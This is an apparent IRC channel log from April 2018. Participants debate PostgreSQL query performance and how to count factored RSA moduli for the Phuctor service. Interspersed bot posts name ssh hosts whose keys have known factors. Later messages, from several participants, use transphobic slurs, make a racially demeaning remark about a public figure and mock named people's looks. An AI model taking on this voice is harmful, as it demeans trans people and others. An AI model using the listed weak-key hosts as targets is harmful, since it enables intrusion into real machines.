1534...5097 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (u6026.netangels.ru. RU) 1805614;1524734762;deedbot;http://phuctor.nosuchlabs.com/gpgkey/13B9634AB1625216E961F690C790F9232A8DB51D071E33A48196794C879B9523 << Recent Phuctorings. - Phuctored: 1356...7313 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown HK) 1805615;1524735817;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1CB26FAAEE6F4F6C493FEDAB70602DD6771C643BEBABD7AFBD51B72D0CE51A8D << Recent Phuctorings. - Phuctored: 1415...5359 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (64-129-88-132.static.ctl.one. US TN) 1805616;1524736363;deedbot;http://phuctor.nosuchlabs.com/gpgkey/ACA7CBF1B441A8D2E63CD93CEAF781222E39F4662CBFFB1A70D508FA3610C59C << Recent Phuctorings. - Phuctored: 1501...0227 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (u6026.netangels.ru. RU) 1805617;1524737453;deedbot;http://phuctor.nosuchlabs.com/gpgkey/564615629DC91F2381C7E379C44EB9B72C6A182C76B3903826E08DAA4D7023BF << Recent Phuctorings. - Phuctored: 1496...4893 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( BR PE) 1805618;1524753541;mod6;Mornin'! 1805619;1524754119;asciilifeform;ohai mod6 1805620;1524754199;asciilifeform;http://btcbase.org/log/2018-04-26#1805608 << i know 'explain' command, but its output was of 0 help in re: e.g. the 'in ...' vs 'not in ...' puzzle. and pretty much everywhere else. 1805621;1524754199;a111;Logged on 2018-04-26 03:41 trinque: re: db, I'm reserving a lul now for when asciilifeform discovers that postgresql does, in fact, tell you what an operation will cost before you run it. 1805622;1524754276;asciilifeform;but yes, trinque , as phf demonstrated, with sufficient years of study of black magic, it is almost possible to use sql as if it were a sane tool created by sane people. 1805623;1524755633;mod6;I've always thought that DBAs are the most masochistic of the bunch. 1805624;1524755673;mod6;It was recently that someone was like, "Hey, come work for us, there is a role as Database Arch..." "Umm. No thanks..." 1805625;1524755702;mod6;That's one role that I've never wanted to have. I've watched these people wanna kill themselves for 20 years. 1805626;1524755985;mod6;It can be especially bad when you inherit a wing-ding pile of garbage (i.e. no constraints, the usual nonsense) that also happens to be a sacred cow. 1805627;1524756022;mod6;"OMG YOU CAN'T PUT IN KEYS!? THINK OF THE CHILDREN!!1" 1805628;1524756057;mod6;No, Thank You for playing. I'll go make screwdriver handles instead. 1805629;1524756192;mircea_popescu;asciilifeform, as a general rule, when diagnosis tools are 0 help pretty much everywhere the problem is not the "poor quality of the ultrasound". you gotta be a doctor to read those. 1805630;1524756245;mod6;this is true, explain plans can be hard to decipher when you first start looking at them. 1805631;1524756254;mod6;more forum 1805632;1524756502;mircea_popescu;mod6, amusingly, dba is one of the few it fields i'm somewhat familiar with. never wanted to kill self. 1805633;1524756530;mod6;We're lucky then! 1805634;1524756535;asciilifeform;http://btcbase.org/log/2018-04-26#1805578 << article updated; possibly 1st time querying ( believe or not... ) reddit, yielded up a useful seekrit 1805635;1524756535;a111;Logged on 2018-04-26 00:05 deedbot: http://www.loper-os.org/?p=2326 << Loper OS - Open Problem: Delousing the Asus C101PA. 1805636;1524756535;mircea_popescu;i think the problem is rather that people try to do it as work for hire. which works well enough for "flash programmers" and php copy-pasters and i guess "web designers". 1805637;1524756555;mircea_popescu;but databases have this problem asciilifeform ran into, too, whereby they dun care about your mental models, adapt to their needs or go awya. 1805638;1524756564;mod6;yes. 1805639;1524756577;mod6;Ususally these guys come in and have to wrangle this mess of shit. 1805640;1524756582;asciilifeform;mircea_popescu: this is troo of ~all~ programming systems; only variation is in just how perverse the imposed model 1805641;1524756593;mircea_popescu;and since most people a) have to deal with "idea men", ie dorks whose undisciplined mental process was never really checked by reality and b) don't ever have the authority to tell them off... well... of course the result is temptation to suicide. 1805642;1524756600;mircea_popescu;asciilifeform, exactly. 1805643;1524756877;mod6;I kinda like trying to performance tune databases a bit... just as long as I don't have to "own" the db. 1805644;1524756896;mod6;The field has a lot of depth. It's kinda wild. 1805645;1524757014;mod6;For instance, the database in the salt mine here, is 400+ tables and growing. 1805646;1524757025;asciilifeform;( 'how perverse the imposed model' is imho not a purely subjective statement -- and goes back to the 'orthogonality' discussion; if , as in the earlier thread, in your system adding a 'not' gate suddenly turns a o(n log n) op into a o(n^2), this is perverse, as there cannot be any mathematical justification for it, it is purely a result of braindamaged programmers 1805647;1524757026;asciilifeform;) 1805648;1524757045;mod6;Most of these need not exist. But, alas, sacred cow. Na na na na. Can't touch this. 1805649;1524757079;mod6;So, don't mind looking at it, just don't wanna be responsible for it :] 1805650;1524757398;mircea_popescu;asciilifeform, there ~can~ be a reason for it. you're saying "whether the geometry is braindamaged or not depends on whether my naive assumptions of metrics are satisfied or not, therefore only some of the n-spheres are valid geometry". not so. 1805651;1524757431;mircea_popescu;now, whether the abstrusity has any good practical reason, that's a different concern. but in principle you can end up with the sad fate where both "trying to go to the store" is a lifetime adventure and there's very good reasons for it being so. 1805652;1524757456;asciilifeform;if i calculate the actual algorithmic cost from first principles and it is asymptotically less than what postgres gives -- postgres is braindamaged, and there is no court of appeal 1805653;1524757465;mircea_popescu;which is why i don't agree "wild west ie wisconsin in 1860" is "braindamaged". notwithstanding the sheer lack of convenience stores. 1805654;1524757470;asciilifeform;(rather than 'naive assumptions') 1805655;1524757498;mircea_popescu;asciilifeform, from the same "first principles" you can expect impossible properties in extended geometries. you're familiar with this, yes ? 1805656;1524757510;asciilifeform;familiar, and i dispute the relevance. 1805657;1524757525;mircea_popescu;but on what grounds ? 1805658;1524757555;asciilifeform;because this here is an elementary instance of 'f-student uses bubble sort where adult would quicksort' 1805659;1524757565;asciilifeform;somewhere, in there. as evidenced by the unjustifiable slow. 1805660;1524757581;mircea_popescu;i do not think so. 1805661;1524757582;asciilifeform;granted, i know from whence this came, it is from db system trying to be 'all things to all people' 1805662;1524757591;mircea_popescu;well so then. 1805663;1524757675;asciilifeform;( seealso oldthread, http://btcbase.org/log/2017-03-10#1624517 ) 1805664;1524757675;a111;Logged on 2017-03-10 19:34 asciilifeform: Framedragger: i am increasingly finding that 'general purpose db' is, like the infamous 'vise-grip', The Wrong Tool For Every Job 1805665;1524757761;asciilifeform;btw interestingly enuff, last night i upped the working memory for postgres to 64GB (from 128MB default), and the per-connection buffer to 2GB (from 2MB default) , and this resulted in 0 measurable change in performance. 1805666;1524757788;asciilifeform;apparently linux disk caching is already pretty good. 1805667;1524757792;asciilifeform;and does ~same thing 1805668;1524757803;mircea_popescu;that it is. 1805669;1524757849;asciilifeform;dug also for some days re how to make the counting ops (for 'stats' page) not be o(N), and found 0 usefully actionable pill 1805670;1524757919;asciilifeform;( i burned considerable time on this and related questions prior to the outage also, to similarly disappointing result ) 1805671;1524758254;mircea_popescu;autoindex the table report the index. 1805672;1524758319;mircea_popescu;i'm sorry. autoINCREMENT. 1805673;1524758346;asciilifeform;mircea_popescu: this is trivial for only the items that correspond to rows of a table 1805674;1524758356;mircea_popescu;SELECT LAST_INSERT_ID(); always faster than select count* 1805675;1524758369;mircea_popescu;well, i imagine eg the cracked moduli get sent to a table of their own. 1805676;1524758371;asciilifeform;however 'has factors' does not correspond to a row. 1805677;1524758374;asciilifeform;they do NOT. 1805678;1524758378;asciilifeform;and will not. this is fundamental. 1805679;1524758380;mircea_popescu;why not ? it's cheap. 1805680;1524758390;mircea_popescu;save a copy somewhere, what's it cost you. 1805681;1524758400;asciilifeform;it is not cheap, the copy has to be updated continuously 1805682;1524758429;mircea_popescu;just one insert whenever you find a nerw one. 1805683;1524758436;asciilifeform;this was in phuctor v.2 (prev ver) , and was one of the things that made it bog-slow 1805684;1524758439;mircea_popescu;if it's cheap enough for deedbot to broadcast, it's cheap enough for an insert 1805685;1524758465;asciilifeform;deedbot gets rss turd that is a cached copy, generated asynchronously 1805686;1524758473;mircea_popescu;i can't see how this could possibly work ?! so you made a special, "this is where we copy cracked moduli" table, and inserted into it, and this slowed your querties on your main table ? 1805687;1524758573;asciilifeform;the mega-optimization of the third rewrite, was to make the werker ( c proggy, number cruncher ) process ~never~ touch the moduli table. so that the latter could be continuously filled up by new inputs, and not lock 1805688;1524758655;mod6;shouldn't have been a problem with row-level locking neh? 1805689;1524758671;asciilifeform;mod6: table-level locking. in postgres. 1805690;1524758679;mod6;wat, ish. 1805691;1524758717;mod6;there's gotta be. 1805692;1524758724;mircea_popescu;asciilifeform, seems to me you can always fill the cracked moduli table at the time you announce them to deedbot. shouldn't lock your main moduli table in being a diff table. 1805693;1524758731;mircea_popescu;then you can offer a count as good as anyone knows. 1805694;1524758757;asciilifeform;the 'announce' is not a push process. when rss pg is loaded, and cache expired, it actually issues the query 1805695;1524758774;mircea_popescu;so ? 1805696;1524758775;asciilifeform;i.e. 'for which moduli, are there known factors' 1805697;1524758785;mod6;Command duration or timeout: 7 milliseconds 1805698;1524758785;mod6;Build info: version: '2.50.1', revision: 'd7fc91b29de65b790abb01f3ac5f7ea2191c88a7', time: '2016-01-29 11:11:26' 1805699;1524758788;mod6;System info: host: 'notus', ip: '', os.name: 'Linux', os.arch: 'amd64', os.version: '3.16.0-4-amd64', java.version: '1.8.0_144' 1805700;1524758791;mod6;Driver info: com.jamf.qa.automation.lib.web.common.browsers.ScrollableChromeDriver 1805701;1524758796;asciilifeform;mod6: ??? 1805702;1524758798;mircea_popescu;~at that time~, whenever it is, you can also insert them into a separate table with an autoindex field. 1805703;1524758822;mod6;christ, sorry. 1805704;1524758825;mircea_popescu;lol 1805705;1524758843;mod6;https://www.postgresql.org/docs/9.1/static/explicit-locking.html << 13.3.2 1805706;1524759092;mod6;anyway, might be a moot point now that youve changed your number crucher thingy. 1805707;1524759094;asciilifeform;http://btcbase.org/log/2018-04-26#1805702 << i'm surprised that mircea_popescu did not go straight to 'increment a counter when they're found!' 1805708;1524759094;a111;Logged on 2018-04-26 16:06 mircea_popescu: ~at that time~, whenever it is, you can also insert them into a separate table with an autoindex field. 1805709;1524759118;mircea_popescu;well, at some point. 1805710;1524759147;mircea_popescu;if your complaint is "why is my counting take time to count", the http://btcbase.org/log/2018-04-26#1805658 solution is "keep a count, add to it". 1805711;1524759147;a111;Logged on 2018-04-26 15:45 asciilifeform: because this here is an elementary instance of 'f-student uses bubble sort where adult would quicksort' 1805712;1524759161;mircea_popescu;but i'm guessing "first principles" means different things depending on who's wielding it ? 1805713;1524759193;asciilifeform;this sounds great until it is time to 'unfind' a factor, as in http://btcbase.org/log/2018-04-25#1805504 or the prev case where the thing turned up a corner case in bernstein and found 300+ or wat was it spurious factors 1805714;1524759193;a111;Logged on 2018-04-25 15:26 asciilifeform: http://btcbase.org/log/2018-04-25#1805475 << lol somehow nobody but me noticed the bug. i fixed it this morning, all that remains is to clean the crapola from the db, will do this after backup 1805715;1524759223;mircea_popescu;yes well. write better code. 1805716;1524759231;asciilifeform;and find better bernsteins lol 1805717;1524759249;mircea_popescu;but srsly, so what, you dirty the count and re-run the op to find it. big whoop, hapens once every 5 years 1805718;1524759261;asciilifeform;wasn't a 'code bug', but algo. 1805719;1524761503;phf;i suspect that's it's my favorite SAT, mapping declarative problems to an optimal imperative solution is NP, but nobody approaches it that way anyway, instead it's heuristics which have specific failure modes on case by case basis. ascii can see see the "obvious" derivation of optimal imperative solution from declarative code, but postgresql's compiler can't 1805720;1524761545;asciilifeform;phf: aha. process is unpleasantly reminiscent of programming in, e.g., 'prolog'. 1805721;1524761557;phf;i suspect a lot of these obvious derivations are well known too, but there's like 5 people who know enough postgresql internals to implement them. 1805722;1524761578;asciilifeform;'when you paint the knobs blue, it's o(n log n), but if you paint'em green, it's o(n!)' etc 1805723;1524761581;phf;that is implement the necessary optimization 1805724;1524761647;asciilifeform;phf: and yes also it's a 'job creation language', and imho undeservedly gets good reputation among thinking people ( e.g. mircea_popescu ) because it is the 'jobs for greybeards' type, rather than 'for 19yo shits' a la perl 1805725;1524761715;asciilifeform;and it lives on, and each new generation gets to suffer in it, because the only folx qualified to kill it are exactly those greybeards, who blew 20+ yrs of life on studying the voodoo incantations. 1805726;1524761715;mod6;:D 1805727;1524761821;mircea_popescu;phf, moreover, the incentive structure is FUCKED UP. 1805728;1524761841;mircea_popescu;they're probably sitting somewhere polishing statuetters because the insane culture they live in misdirects them there rather than here. 1805729;1524761843;asciilifeform;( asciilifeform also suspects that the very problem of 'kill sql' is ill-posed, and that sane replacement would be a much humbler and lower-level thing that actually exposes the mathematical data structures -- e.g. btree -- in a programmable way, with no attempt at 'intelligence' and ~iron~ correspondence b/w what one writes and what the machine does ) 1805730;1524761867;mircea_popescu;which is how we have fucking "interfaces" and otherwise computers still run on an unexamined hope and an expiured prayer leftover from 1971 1805731;1524761877;phf;asciilifeform: that's how allegro does it 1805732;1524761894;asciilifeform;phf: also how 'joshua' did it, iirc 1805733;1524761898;asciilifeform;or what was it. 1805734;1524761904;mircea_popescu;asciilifeform, i doubt i'd use this item for anything. 1805735;1524761910;asciilifeform;phf: 'statice' 1805736;1524761943;asciilifeform;mircea_popescu: conceivably you could use a subset-of-sql-used-in-mpwp on top of it. 1805737;1524761960;mircea_popescu;yeah, and this tower of pancake would have broken and i wouldn't use it. 1805738;1524761984;asciilifeform;yet somehow the mysql 'tower of pancake' is solid enuff ? 1805739;1524761992;asciilifeform;why not new tower, >= solid. 1805740;1524762022;asciilifeform;( not as if i have one in my pocket! but seems as if mircea_popescu disagrees that it could be made, in principle ?? ) 1805741;1524762034;deedbot;http://qntra.net/2018/04/small-town-school-board-faces-heat-over-inaccessible-second-floor-locker-room/ << Qntra - Small Town School Board Faces Heat Over "Inaccessible" Second Floor Locker Room 1805742;1524762053;mircea_popescu;very fucking solid lol. it's run trilema for years!!1 1805743;1524762079;phf;mircea_popescu: the ones that don't tend to be contracted by large postgresql users, but then the incentive is fucked up, because large postgresql users have already worked around the well known voodoo cases and want fancy new features instead, that run orthogonal to core (and in a very high level architectural sense are often the result of the core's "voodoo" limitations) 1805744;1524762124;mircea_popescu;you understand this ? your car ALSO doesn't expose injector timings to you. i don't care you think you'd do a better job by hand. the direction's been away froim the fucking clutch, even. i personally own a car running tiptonic gearbox and girl who's an excellent stick driver, and she STILL prefers the autoclutch. because the machine does it way the fuck better, what. 1805745;1524762141;mircea_popescu;phf, yup. exactly. 1805746;1524762192;mircea_popescu;the mechanical impedance of the pedal drowns out any possible contribution the human c9ould put in. the stick can fucking detect "hey, we're getting moved, undo the coupling!" electronically well enough 1805747;1524762214;asciilifeform;mircea_popescu: problem is that the 'auto gearbox' in postgres, isn't worth much 1805748;1524762229;mircea_popescu;and so is the situation here, the management cost of the general purpose solution you propose by so far drowns out any possible benefit of "hey, alf had to learn something, instead of relying on his assumptions" you can't imagine. 1805749;1524762234;asciilifeform;and reasonable performance seems to require manual shift and 'formula 1' pro race driver 1805750;1524762242;mircea_popescu;it's not worth much to you, ands this because you don't want to write postgres. 1805751;1524762248;mircea_popescu;which is fine. BUT IRRELEVANT. 1805752;1524762277;mircea_popescu;the ticket to insanity is trying to adapt systems for the benefit of those who didn't want to use them in the first place. 1805753;1524762285;mircea_popescu;ties neatly into the above discussion re wasted talent also. 1805754;1524762318;asciilifeform;does mircea_popescu recognize a diff b/w e.g. 'you must learn grassman algebra to understand $system' and 'you must learn postgres 10.0 ...' ? 1805755;1524762352;mircea_popescu;your problem isn't "postregs 10.0". your problem is exactly what i told you yest -- you want support for your recursion exposed by a fucking declarative lang. wtf. 1805756;1524762356;mircea_popescu;it will NEVER happen. 1805757;1524762370;asciilifeform;phf in fact yielded up a pill that 1) makes it happen 2) doesn't write to disk 1805758;1524762383;mircea_popescu;because he knows both you and it well enough to lie to both and neither of you get it. 1805759;1524762397;mircea_popescu;which yes, marks him for an exceptional manager, but remember -- traddutore, tradditore. 1805760;1524762399;asciilifeform;how's it a lie ? i measured it, it dun write. 1805761;1524762405;mircea_popescu;right-o. 1805762;1524762422;BingoBoingo; and reasonable performance seems to require manual shift and 'formula 1' pro race driver << Nah, Plenty of enthusiast vehicles are starting to get a "Drag Racing" transmission mode. Shifting in motorsports is mostly preserved for the sport aspect as opposed to the motor part. 1805763;1524762537;BingoBoingo;Put vehicle into "drag race" mode. Smash gas pedal. Hold Steering wheel. 1805764;1524762765;asciilifeform;incidentally , seems to me that this thread is rightfully part of the 40+ yr 'compilers vs hand asm' wars. 1805765;1524762957;asciilifeform;http://btcbase.org/log/2018-04-26#1805748 << can't resist to come back to this one : imho some types of 'learning' are actually bad for health. ever wonder ~why~ the greybeards are incurable, and never show here ? doesn't seem to you that 20yrs polishing expertise in msexcel^H^H^H^Hpostgres might have something to do with it ? 1805766;1524762957;a111;Logged on 2018-04-26 17:03 mircea_popescu: and so is the situation here, the management cost of the general purpose solution you propose by so far drowns out any possible benefit of "hey, alf had to learn something, instead of relying on his assumptions" you can't imagine. 1805767;1524762990;mircea_popescu;might be, yes. 1805768;1524762991;asciilifeform;recall the trilema piece re 'machinist is not professional, but an accessory to the machine' ? 1805769;1524762997;mircea_popescu;i do. 1805770;1524763076;asciilifeform;imho 'study arcana of $system' is exactly that. yes, from narrowly tunnelled picture of efficacy -- 'the thing to do.' but from 'want to be man, not extension of machine' pov -- problem. 1805771;1524763140;mircea_popescu;nevertheless, you will not die if you step out of a narrow model. you're a very elegant thinker, and evidently imagine elegance is the only possible value. nevertheless, adherence can on occasion, howsoever rarely but proportionally painfully, actually more valuable than elegance. 1805772;1524763168;mircea_popescu;pretty much every single thread of "oh, alf could solve this problem -- in a vacuum" comes down to this, an incorrect choice between the two in one of those rare field cases where adherence actually trumps elegance. 1805773;1524763207;mircea_popescu;there's nothing wrong with declarative languages ; as proven by the very fact that you find yourself constrained to use them NOW AND AGAIN. 1805774;1524763945;deedbot;http://trilema.com/2018/the-story-of-the-bitter-thorn-and-other-terrors/ << Trilema - The story of the bitter thorn and other terrors 1805775;1524764361;deedbot;http://phuctor.nosuchlabs.com/gpgkey/2C25ED03E53166D7F006E5BE5355A2DE3F122DD94F3971DBB7D23C21355872B7 << Recent Phuctorings. - Phuctored: 1650...6297 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (kvm.casablanca.cz. CZ) 1805776;1524764913;deedbot;http://phuctor.nosuchlabs.com/gpgkey/564615629DC91F2381C7E379C44EB9B72C6A182C76B3903826E08DAA4D7023BF << Recent Phuctorings. - Phuctored: 1685...4233 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' ( BR PE) 1805777;1524770416;asciilifeform;meanwhile in entomology dept, https://archive.li/oV50b 1805778;1524770784;trinque;is this the same libreboot tranny, or yet another one 1805779;1524770797;trinque;who can differentiate them 1805780;1524770798;asciilifeform;trinque: believe or not, different one. 1805781;1524770805;asciilifeform;they have at least several. 1805782;1524770880;trinque;castrati gotta remove the taint! 1805783;1524770886;mircea_popescu;amusingly, dumbass forgot to start by saying "as mp told me would happen in http://trilema.com/2012/anonimity-or-the-urban-versus-rural-dispute/ i was unable..." 1805784;1524770989;asciilifeform;trinque: folx who smash their heads repeatedly against immovable (with the available tools) wall, begin to resemble one another, independently of precisely which wall is chosen 1805785;1524771022;mircea_popescu;"From March 2011 on, I have spent an insane amount of time on this. Codethink paid, all-in-all, 6 weeks of my time when i was between customer projects." << and then come here asking for TWENTy MILLIONS 1805786;1524771035;asciilifeform;lolwat when was this 1805787;1524771040;mircea_popescu;because totally, that's what i'm competing with. it's not the case that per-hour imperial pay for computer work is under a cent. 1805788;1524771052;mircea_popescu;asciilifeform, some dood, thought she did something or the other in crypto 1805789;1524771057;mircea_popescu;excuse me if they all run together in my mind. 1805790;1524771063;asciilifeform;mircea_popescu: what cent, these folx work ('work'...?) for ~phree 1805791;1524771078;asciilifeform;cent is like a beautiful dream, for most opensores sufferers 1805792;1524771096;mircea_popescu;fuck 'em. 1805793;1524771165;mircea_popescu;https://archive.li/XmwAh << anyway, fwiw the better emo rant (aptly -- on livejournal). 1805794;1524771172;mircea_popescu;not really worth reading. 1805795;1524771180;asciilifeform;aa the gpu d00d 1805796;1524771229;mircea_popescu;"Now I have a choice. I can wait until i am in the mood to clean up this code and produce something useful for public consumption, and in the meantime see my name and my work slandered. Or... If i throw my (nasty) code over the wall, someone will rename/rewrite it, mess up a lot of things, and trash me for not having done corner X or Y, so essentially slander me and my work and probably even erase my achievements from history 1805797;1524771229;mircea_popescu;, by using more of my work against me... And in the latter case i give people like Jasper and companies like Endless Mobile what they want, in spite of their contemptible actions and statements. Logically, there is only one conclusion possible in that constellation." 1805798;1524771231;mircea_popescu;bla bla bla bla. 1805799;1524771234;asciilifeform;( it was the root wank behind the others, i did not link to it because it is deeply opaque other than to dedicated entomologist ) 1805800;1524771263;asciilifeform;sleep of reason begatting monsters, or how did it go. 1805801;1524771265;mircea_popescu;i honestly enjoy watching "good men" in the sense of dedicatedly evil but biologically promising intellects like this fucktard, the murdock dork and so on getting fucked. 1805802;1524771342;asciilifeform;the d00d throwing away his sores, is classical 'назло кондуктору: куплю билет пойду пешком!' analchild maculae 1805803;1524771368;mircea_popescu;everyone else has the ready excuse : i'm with usg because who else would give a straw hat for the asshole of a barely literate black woman ? ~condolezza rice. 1805804;1524771378;mircea_popescu;that much makes sense. the empire of idiots is for and by idiots, yes. 1805805;1524771381;asciilifeform;('to spite the conductor! i'll buy a ticket and.. WALK!11') 1805806;1524771396;mircea_popescu;heretics joining them -- well they utterly fucking deserve everything they get, don't they. 1805807;1524771423;mircea_popescu;asciilifeform, exactly so. 1805808;1524771464;asciilifeform;mircea_popescu: presumably they labour under belief that they're in opposition to thebeast. ( rather than the reality of 'obrien' and 'can of coke on the left', 'blue usg', etc padded playrooms ) 1805809;1524771491;mircea_popescu;yaya. 1805810;1524771494;mircea_popescu;they know better. 1805811;1524771578;asciilifeform;the concern with usg.legality of throwing open 'nda' datashits, leaked src, etc. among the 'respects yer fleadom!11' folx, asciilifeform found 'zoologically' allergenic turn-off even 10yrs ago, barfed, long before encountering mircea_popescu et al 1805812;1524771599;mircea_popescu;i do not even for a second believe they don't know better. 1805813;1524771626;mircea_popescu;exactly like i don't for a second btcvixen or w/e it was doesn't know he's just a sad dork with a self-mutilated penis. 1805814;1524771652;mircea_popescu;but they're doing the "Clever" thing they picked up at kiddy rape farm (aka "school" in their lingo), whereby "doing it because getting away with it" 1805815;1524771656;asciilifeform;hey that's what the dope is for, neh, to put the remaining neurons to narcotic sleep 1805816;1524771669;mircea_popescu;or w/e, "let's see how far i can push nonsense before daddy finally loves me enough to say something" 1805817;1524771757;asciilifeform;the lolturd at the heart of the lj piece, 'This is pure unadulterated slander. Lima is not in any way tainted. It is freshly written MIT code and I was never exposed to original ARM code. This statement is an outrageous lie, and it is amazing that anyone in the open source world would lie like that and expect to get away with it.' << somehow does not occur to the author, that he has a problem , if the 'colour of the bits' is permitte 1805818;1524771757;asciilifeform;d to matter, he can be slandered with impunity, troo or not 1805819;1524771774;asciilifeform;yet -- he buys in. 1805820;1524771780;trinque;https://www.phoronix.net/image.php?id=0x2012&image=blt_2012_02_med << look at this dead-eyed creature 1805821;1524771824;asciilifeform;trinque: ha. i expected the usual goatee transsexual thing. 1805822;1524771834;asciilifeform;this one looks moar like escapee from chain gang 1805823;1524771841;asciilifeform;( or possibly psych ward ) 1805824;1524771865;asciilifeform;which one is he ? 1805825;1524771897;trinque;creature from mircea_popescu's lj link 1805826;1524771900;asciilifeform;aa 1805827;1524772131;mircea_popescu;upgraded zombie! 1805828;1524773009;phf;http://btcbase.org/log/2018-04-26#1805820 << https://i.ytimg.com/vi/6hkNuykz2RE/maxresdefault.jpg 1805829;1524773009;a111;Logged on 2018-04-26 19:43 trinque: https://www.phoronix.net/image.php?id=0x2012&image=blt_2012_02_med << look at this dead-eyed creature 1805830;1524773636;deedbot;http://phuctor.nosuchlabs.com/gpgkey/2C25ED03E53166D7F006E5BE5355A2DE3F122DD94F3971DBB7D23C21355872B7 << Recent Phuctorings. - Phuctored: 1497...1759 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (kvm.casablanca.cz. CZ) 1805831;1524785334;*;asciilifeform found only today that apparently 'coreboot' contains something like a minimal gnat runtimelib, as of 2016 1805832;1524785355;asciilifeform;( formerly 'linuxbios' ) 1805833;1524785375;asciilifeform;ave1 ^ 1805834;1524787764;deedbot;http://thewhet.net/2018/04/panama-makes-me-ill/ << The Whet - Panama Makes Me Ill 1805835;1524787824;asciilifeform;hanbot: on my display , the article is about an inch wide ( photos also squashed ) 1805836;1524787843;asciilifeform;what's moar, on several machines, with various wwwtrons 1805837;1524788625;hanbot;oh, fun. i'll investigate, meanwhile it should read properly on the index 1805838;1524788869;asciilifeform;oh hey worxnao 1805839;1524788882;asciilifeform;( from main pg ) 1805840;1524788903;*;asciilifeform only ever been in panamacityairport, and hated erry minute of it 1805841;1524788917;hanbot;ohhyeah. 1805842;1524788945;hanbot;i think it and heathrow are my least favorite. 1805843;1524788977;asciilifeform;never did get the airport wifi to work, iirc 1805844;1524789009;hanbot;there's a lounge ($50 entry, cc only) where it works, heh. 1805845;1524789028;asciilifeform;presumably faraday-caged, lol 1805846;1524789076;hanbot;possibly the fast food fumes interfere 1805847;1524790115;BingoBoingo;Panama airport was a very exciting 45 minutes of my life 1805848;1524790215;deedbot;http://trilema.com/2018/la-moartea-lui-fulger-on-trilema-rotaku-club/ << Trilema - La Moartea Lui Fulger on Trilema Rotaku Club 1805849;1524792049;mod6;<+phf> http://btcbase.org/log/2018-04-26#1805820 << https://i.ytimg.com/vi/6hkNuykz2RE/maxresdefault.jpg << lol, i had the same thing in mind. 1805850;1524792049;a111;Logged on 2018-04-26 19:43 trinque: https://www.phoronix.net/image.php?id=0x2012&image=blt_2012_02_med << look at this dead-eyed creature 1805851;1524792074;mod6;evenin tmsr~ 1805852;1524792699;mircea_popescu;^ proofread item again, fixed like two dozen byte errors, so. reload if you're reading prior version. 1805853;1524794370;asciilifeform;meanwhile, in entomology dept, https://archive.li/9fLe8 ( continuation of ancient and forgotten lulzfest http://btcbase.org/log/2017-05-13#1655371 ) 1805854;1524794370;a111;Logged on 2017-05-13 14:31 asciilifeform: the simon and speck thing was egregiously funny because they were published 'for lulz', 'maybe someone will pick up this toy', rather than mandated somewhere 1805855;1524795080;mircea_popescu;just in time because we have these tough customers running out of reading material >D 1805856;1524795177;mircea_popescu;"While no one has directly accused the NSA of inserting backdoors" 1805857;1524795181;mircea_popescu;aaahahaha BULLSHIT. 1805858;1524795207;asciilifeform;hey, was stamped 'entomology'!11 1805859;1524795240;mircea_popescu;hey, world also is full of terminal cancer patients going "lalala my cancer went away" 1805860;1524795282;asciilifeform;perhaps moar interestingly, also of stroke victims who genuinely think 'i can move that arm, just haven't been feeling like it' 1805861;1524795343;mircea_popescu;it;s just a fleshwound! 1805862;1524796294;hanbot; hanbot: on my display , the article is about an inch wide ( photos also squashed ) << fixed nao. thanks for reporting! 1805863;1524796325;asciilifeform;verily, it is fixed! 1805864;1524798475;deedbot;http://phuctor.nosuchlabs.com/gpgkey/175A4092F61F9C375817E0752E2ACCBD43E0ABD014580BBF6569EC16B36B6ECA << Recent Phuctorings. - Phuctored: 1216...8727 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown ZA) 1805865;1524798475;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8159D44B9E52C12B332B065E91377A5B26D6841DB6EC4F7D8F88FB4191B3EADE << Recent Phuctorings. - Phuctored: 1216...8727 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown ZA) 1805866;1524798475;deedbot;http://phuctor.nosuchlabs.com/gpgkey/13E82F824B83584C0CEC6D9C2D29B4DA59E8A469DAF84126A264FDD744B8488D << Recent Phuctorings. - Phuctored: 1216...8727 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (chs-bac02.cpt4.remote.chs.hetzner.co.za. ZA) 1805867;1524798680;mod6;asciilifeform: panamacityairport was that bad? 1805868;1524798721;*;mod6 catches up here 1805869;1524799358;mod6;nice post hanbot 1805870;1524801734;hanbot;whyty :) 1805871;1524801776;mod6;site is looking good too - everything working as it should be now? 1805872;1524801979;hanbot;pretty much. header and footer are off by one pixel but i'm saving that fix for next time i feel all ocd. i'm very happy with the hosting! 1805873;1524802012;mod6;Alright, good to hear. :] 1805874;1524802271;mod6;mircea_popescu's thorn/winged-paratrooper boob stinging story; reminds me of a time I was cutting down a tree and a wasps nest was in there - it was hot out and I had my shirt off. the fuckers flew down my pants, stung me in the ass like a hundred times. 1805875;1524802292;mircea_popescu;pretty great header i thought. 